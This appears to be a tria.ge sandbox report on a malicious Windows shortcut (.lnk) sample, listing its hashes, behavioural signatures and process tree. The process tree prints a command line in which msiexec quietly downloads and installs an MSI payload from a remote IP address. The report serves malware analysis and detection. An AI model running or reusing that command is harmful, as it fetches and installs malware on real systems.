Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
07/06/2023, 02:45
Static task
static1
Behavioral task
behavioral1
Sample
baff93a9574ff019ad8a1cff0b712d6f.lnk
Resource
win7-20230220-en
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
baff93a9574ff019ad8a1cff0b712d6f.lnk
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
baff93a9574ff019ad8a1cff0b712d6f.lnk
-
Size
2KB
-
MD5
baff93a9574ff019ad8a1cff0b712d6f
-
SHA1
bf927b871abbc068b7030e0e7b79797fa7bce59d
-
SHA256
fb48b9102388620bb02d1a47297ba101f755632f9a421d09e9ab419cbeb65db8
-
SHA512
37c94879618003ef04c96c3e63f37f91a80393bdf220a7e6522a7f5a4cd46badc6542499c916d0a348c453125377ae9698d392ee2c79162da89e629f8ac95e2a
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 560 msiexec.exe -
Use of msiexec (install) with remote resource 1 IoCs
pid Process 112 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 112 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 112 msiexec.exe Token: SeIncreaseQuotaPrivilege 112 msiexec.exe Token: SeRestorePrivilege 560 msiexec.exe Token: SeTakeOwnershipPrivilege 560 msiexec.exe Token: SeSecurityPrivilege 560 msiexec.exe Token: SeCreateTokenPrivilege 112 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 112 msiexec.exe Token: SeLockMemoryPrivilege 112 msiexec.exe Token: SeIncreaseQuotaPrivilege 112 msiexec.exe Token: SeMachineAccountPrivilege 112 msiexec.exe Token: SeTcbPrivilege 112 msiexec.exe Token: SeSecurityPrivilege 112 msiexec.exe Token: SeTakeOwnershipPrivilege 112 msiexec.exe Token: SeLoadDriverPrivilege 112 msiexec.exe Token: SeSystemProfilePrivilege 112 msiexec.exe Token: SeSystemtimePrivilege 112 msiexec.exe Token: SeProfSingleProcessPrivilege 112 msiexec.exe Token: SeIncBasePriorityPrivilege 112 msiexec.exe Token: SeCreatePagefilePrivilege 112 msiexec.exe Token: SeCreatePermanentPrivilege 112 msiexec.exe Token: SeBackupPrivilege 112 msiexec.exe Token: SeRestorePrivilege 112 msiexec.exe Token: SeShutdownPrivilege 112 msiexec.exe Token: SeDebugPrivilege 112 msiexec.exe Token: SeAuditPrivilege 112 msiexec.exe Token: SeSystemEnvironmentPrivilege 112 msiexec.exe Token: SeChangeNotifyPrivilege 112 msiexec.exe Token: SeRemoteShutdownPrivilege 112 msiexec.exe Token: SeUndockPrivilege 112 msiexec.exe Token: SeSyncAgentPrivilege 112 msiexec.exe Token: SeEnableDelegationPrivilege 112 msiexec.exe Token: SeManageVolumePrivilege 112 msiexec.exe Token: SeImpersonatePrivilege 112 msiexec.exe Token: SeCreateGlobalPrivilege 112 msiexec.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 1364 wrote to memory of 112 1364 cmd.exe 29 PID 1364 wrote to memory of 112 1364 cmd.exe 29 PID 1364 wrote to memory of 112 1364 cmd.exe 29 PID 1364 wrote to memory of 112 1364 cmd.exe 29 PID 1364 wrote to memory of 112 1364 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\baff93a9574ff019ad8a1cff0b712d6f.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i http://185.166.217.184/JDXFHUIPGYN98P5GY87S43BF5TW4IYNP/attachment.msi /quiet2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:560